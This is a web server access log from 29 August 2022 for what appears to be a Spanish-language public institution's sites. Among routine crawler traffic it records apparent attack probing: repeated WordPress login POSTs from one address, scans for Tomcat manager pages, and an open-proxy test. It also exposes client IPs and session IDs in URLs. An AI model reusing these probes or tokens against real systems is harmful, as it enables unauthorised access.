186.155.72.189 - - [29/Aug/2022:01:31:00 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX190jNhvKlU/7yeymWJMiXMGsVCXSbv8gW0/YH+x/+5kvPWuab9/+5Op&y=U2FsdGVkX19L1by9XjAr2pI5/4NQEXJbeN9UHPAoGXiPk4GmErxUh2kVPhL2o2O5 HTTP/1.1" 200 25
186.155.72.189 - - [29/Aug/2022:01:31:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/mnpR068z9MsPiMgyFTND1kX5sb0CMGNyYjahUO1wHmWB3saKTVITcTBH3l5E3O4L0JcblrQpDFspzxzqWHbDGIkmsvuXAumg39W/yYaGV9WCbTVtRIDXlUQ6BlucAL8HsH8yH0BMivy/Zn77d2k0gyi19oYcVwRw=&u=U2FsdGVkX190jNhvKlU/7yeymWJMiXMGsVCXSbv8gW0/YH+x/+5kvPWuab9/+5Op&y=U2FsdGVkX19L1by9XjAr2pI5/4NQEXJbeN9UHPAoGXiPk4GmErxUh2kVPhL2o2O5 HTTP/1.1" 200 25
186.155.72.189 - - [29/Aug/2022:01:31:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+fnL39ilazlIwJLY+7WVqlqowke/v5ff8w1RZp1oei38SVAZ/W4mmUEigTuG1wI7eHYghvpZ0nHdSm3yXC43Cq/ZLSFz3DPT+7Z9utHZwnK6JY9tSg0PDSyNX46t2WaTJ9ihTHs8S3W++pVvMU8fBJD/4AyVIwGQk=&u=U2FsdGVkX190jNhvKlU/7yeymWJMiXMGsVCXSbv8gW0/YH+x/+5kvPWuab9/+5Op&y=U2FsdGVkX19L1by9XjAr2pI5/4NQEXJbeN9UHPAoGXiPk4GmErxUh2kVPhL2o2O5 HTTP/1.1" 200 25
186.155.72.189 - - [29/Aug/2022:01:31:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+m5d5zWCvNyIMHH1yF/mXRH6yJxWiAqo/gTpXOISjn6JHoVOft5Xi/YMmMC3KMlkK+Gx5PsXZwYl2RzWOhPp2so1D50/fi0COB78nWh2DDKpj3vQu250Etg1V5MzcVn+/tuPw7KGo3g+/IQ/qi9oWdAHZrS7nN2E4=&u=U2FsdGVkX190jNhvKlU/7yeymWJMiXMGsVCXSbv8gW0/YH+x/+5kvPWuab9/+5Op&y=U2FsdGVkX19L1by9XjAr2pI5/4NQEXJbeN9UHPAoGXiPk4GmErxUh2kVPhL2o2O5 HTTP/1.1" 200 25
186.155.72.189 - - [29/Aug/2022:01:31:01 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+/13qGY7OgZvxqVqqB2WFL+dpyWf8AyZcUFv9gwps3QvFiMF1h2rQtWNozWGKkUzaq69VpShILrlMiEaNwckOON9srWR1nI9U9FlsG5W7bPgM7jgTmGnEmu+8vEo857v277vSAAO5ae8vwUCouxg5Wd6p+FJK4qbT0TP+nHQw5N45vWd+uMiuCyWloZ3vxf1ewR0JYHc0NUQ==&u=U2FsdGVkX190jNhvKlU/7yeymWJMiXMGsVCXSbv8gW0/YH+x/+5kvPWuab9/+5Op&y=U2FsdGVkX19L1by9XjAr2pI5/4NQEXJbeN9UHPAoGXiPk4GmErxUh2kVPhL2o2O5 HTTP/1.1" 200 25
201.245.192.253 - - [29/Aug/2022:01:31:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:01:30:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:01:32:35 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [29/Aug/2022:01:32:52 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04926.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Aug/2022:01:31:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
172.22.2.4 - - [29/Aug/2022:01:35:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2673&usuario=&sector=PEV&fecha=2015&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [29/Aug/2022:01:36:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2673&usuario=&sector=PEV&fecha=2015&resuelve= HTTP/1.1" 200 626
5.255.253.129 - - [29/Aug/2022:01:36:09 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:01:36:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
207.46.13.16 - - [29/Aug/2022:01:36:31 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [29/Aug/2022:01:37:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:01:36:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:01:37:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
207.46.13.36 - - [29/Aug/2022:01:39:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=yo4ovvty1emxsekqositp3-w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [29/Aug/2022:01:39:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42662
207.46.13.186 - - [29/Aug/2022:01:39:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ke6wi7olt62kffpb-h7ukqiu.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
5.45.207.134 - - [29/Aug/2022:01:39:22 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:01:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42439
5.45.207.68 - - [29/Aug/2022:01:39:28 -0500] "-" 408 -
95.108.213.2 - - [29/Aug/2022:01:39:34 -0500] "-" 408 -
95.108.213.61 - - [29/Aug/2022:01:39:39 -0500] "-" 408 -
87.250.224.67 - - [29/Aug/2022:01:39:54 -0500] "-" 408 -
87.250.224.72 - - [29/Aug/2022:01:40:09 -0500] "-" 408 -
87.250.224.34 - - [29/Aug/2022:01:40:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:01:41:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
87.250.224.139 - - [29/Aug/2022:01:41:39 -0500] "-" 408 -
207.46.13.16 - - [29/Aug/2022:01:42:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1391.pdf HTTP/1.1" 304 -
216.245.221.92 - - [29/Aug/2022:01:42:35 -0500] "HEAD / HTTP/1.1" 200 -
141.8.142.94 - - [29/Aug/2022:01:42:39 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:01:42:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.178 - - [29/Aug/2022:01:44:39 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:01:43:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [29/Aug/2022:01:46:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:01:46:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [29/Aug/2022:01:47:35 -0500] "HEAD / HTTP/1.1" 200 -
5.45.207.98 - - [29/Aug/2022:01:47:39 -0500] "-" 408 -
172.22.2.4 - - [29/Aug/2022:01:48:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:01:48:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50037
201.245.192.253 - - [29/Aug/2022:01:51:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:01:52:35 -0500] "HEAD / HTTP/1.1" 200 -
5.45.207.150 - - [29/Aug/2022:01:52:39 -0500] "-" 408 -
207.46.13.36 - - [29/Aug/2022:01:53:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2F HTTP/1.1" 200 24571
185.119.81.100 - - [29/Aug/2022:01:54:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [29/Aug/2022:01:54:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [29/Aug/2022:01:53:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:01:56:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:01:54:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
216.245.221.92 - - [29/Aug/2022:01:57:35 -0500] "HEAD / HTTP/1.1" 200 -
2.57.122.209 - - [29/Aug/2022:01:58:07 -0500] "GET http://example.com/ HTTP/1.1" 200 319
157.55.39.8 - - [29/Aug/2022:01:59:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/887.tif HTTP/1.1" 200 125564
87.250.224.174 - - [29/Aug/2022:02:00:39 -0500] "-" 408 -
66.249.73.161 - - [29/Aug/2022:02:01:11 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:01:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:01:59:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:01:55 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20008%20del%2001%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Aug/2022:02:00:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
216.245.221.92 - - [29/Aug/2022:02:02:35 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.115 - - [29/Aug/2022:02:03:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2049.pdf HTTP/1.1" 304 -
2.57.122.98 - - [29/Aug/2022:02:04:26 -0500] "GET / HTTP/1.1" 200 319
207.46.13.186 - - [29/Aug/2022:02:05:21 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
201.245.192.253 - - [29/Aug/2022:02:06:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:02:05:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Aug/2022:02:07:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:06:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
66.249.73.191 - - [29/Aug/2022:02:08:45 -0500] "-" 408 -
5.255.253.166 - - [29/Aug/2022:02:10:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:11:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:02:12:35 -0500] "HEAD / HTTP/1.1" 200 -
109.135.8.67 - - [29/Aug/2022:02:12:43 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:02:11:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:12:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [29/Aug/2022:02:16:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:02:16:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
185.114.137.114 - - [29/Aug/2022:02:17:12 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Aug/2022:02:17:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:17:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Aug/2022:02:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42612
201.245.192.253 - - [29/Aug/2022:02:19:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
172.22.2.4 - - [29/Aug/2022:02:18:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621
5.45.207.140 - - [29/Aug/2022:02:20:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:21:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:02:22:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:23:07 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
45.95.55.5 - - [29/Aug/2022:02:23:59 -0500] "GET / HTTP/1.1" 200 319
2.57.122.98 - - [29/Aug/2022:02:24:03 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:02:23:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:23:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [29/Aug/2022:02:26:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:02:27:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.191 - - [29/Aug/2022:02:27:58 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42612
201.245.192.253 - - [29/Aug/2022:02:29:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
207.46.13.144 - - [29/Aug/2022:02:30:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Aug/2022:02:28:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.231.250 - - [29/Aug/2022:02:30:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:31:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:02:29:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
216.245.221.92 - - [29/Aug/2022:02:32:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:33:24 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [29/Aug/2022:02:33:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61965
207.46.13.36 - - [29/Aug/2022:02:35:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/879.tif HTTP/1.1" 200 849316
201.245.192.253 - - [29/Aug/2022:02:36:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:02:34:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:35:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
207.46.13.16 - - [29/Aug/2022:02:37:26 -0500] "GET /galeria/galeria/fotos/reciclatonP.jpg HTTP/1.1" 200 57069
216.245.221.92 - - [29/Aug/2022:02:37:35 -0500] "HEAD / HTTP/1.1" 200 -
192.241.212.58 - - [29/Aug/2022:02:39:08 -0500] "GET /manager/text/list HTTP/1.1" 404 1018
201.245.192.253 - - [29/Aug/2022:02:39:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42612
201.245.192.253 - - [29/Aug/2022:02:39:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
87.250.224.76 - - [29/Aug/2022:02:40:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:41:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
172.22.2.4 - - [29/Aug/2022:02:40:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.36 - - [29/Aug/2022:02:42:19 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
216.245.221.92 - - [29/Aug/2022:02:42:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:41:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
185.119.81.100 - - [29/Aug/2022:02:43:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [29/Aug/2022:02:43:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
103.237.175.51 - - [29/Aug/2022:02:45:00 -0500] "GET / HTTP/1.1" 200 319
13.66.139.13 - - [29/Aug/2022:02:45:22 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:46:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
185.119.81.100 - - [29/Aug/2022:02:47:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [29/Aug/2022:02:47:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [29/Aug/2022:02:47:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:45:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
51.159.164.227 - - [29/Aug/2022:02:47:59 -0500] "HEAD /portaldeninos/ HTTP/1.1" 200 -
51.159.164.227 - - [29/Aug/2022:02:48:01 -0500] "HEAD /portaldeninos/ HTTP/1.1" 200 -
51.159.164.227 - - [29/Aug/2022:02:48:02 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
172.22.2.4 - - [29/Aug/2022:02:46:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:47:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
87.250.224.104 - - [29/Aug/2022:02:50:39 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:02:51:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
35.195.93.98 - - [29/Aug/2022:02:51:39 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Aug/2022:02:52:35 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.186 - - [29/Aug/2022:02:53:03 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
207.46.13.115 - - [29/Aug/2022:02:53:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
207.46.13.115 - - [29/Aug/2022:02:53:20 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
207.46.13.186 - - [29/Aug/2022:02:53:24 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
207.46.13.186 - - [29/Aug/2022:02:53:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
207.46.13.16 - - [29/Aug/2022:02:53:29 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
207.46.13.36 - - [29/Aug/2022:02:53:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
207.46.13.36 - - [29/Aug/2022:02:53:39 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
172.22.2.4 - - [29/Aug/2022:02:52:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:53:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
201.245.192.253 - - [29/Aug/2022:02:56:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:02:57:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:02:58:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Aug/2022:03:00:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [29/Aug/2022:02:58:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
118.123.105.85 - - [29/Aug/2022:03:00:38 -0500] "-" 408 -
213.180.203.65 - - [29/Aug/2022:03:00:39 -0500] "-" 408 -
118.123.105.85 - - [29/Aug/2022:03:01:04 -0500] "-" 408 -
201.245.192.253 - - [29/Aug/2022:03:01:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
216.245.221.92 - - [29/Aug/2022:03:02:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.191 - - [29/Aug/2022:03:04:33 -0500] "-" 408 -
192.241.236.11 - - [29/Aug/2022:03:05:07 -0500] "GET /manager/html HTTP/1.1" 404 1018
172.22.2.4 - - [29/Aug/2022:03:03:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.16 - - [29/Aug/2022:03:05:49 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.245.192.253 - - [29/Aug/2022:03:06:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42753
157.55.39.80 - - [29/Aug/2022:03:06:27 -0500] "GET /BLA/resoluciones/AUTOS%202022/0694.pdf HTTP/1.1" 200 387956
172.22.2.4 - - [29/Aug/2022:03:04:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
157.55.39.51 - - [29/Aug/2022:03:07:16 -0500] "GET /images/san-benito-sda-01.jpeg HTTP/1.1" 200 29515
216.245.221.92 - - [29/Aug/2022:03:07:35 -0500] "HEAD / HTTP/1.1" 200 -
40.77.190.58 - - [29/Aug/2022:03:09:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.188.23 - - [29/Aug/2022:03:09:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
40.77.188.248 - - [29/Aug/2022:03:09:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
40.77.189.23 - - [29/Aug/2022:03:09:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=ioePsU6Ywysr-c+5FxiLXBbK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
40.77.189.38 - - [29/Aug/2022:03:09:22 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
5.255.253.164 - - [29/Aug/2022:03:10:39 -0500] "-" 408 -
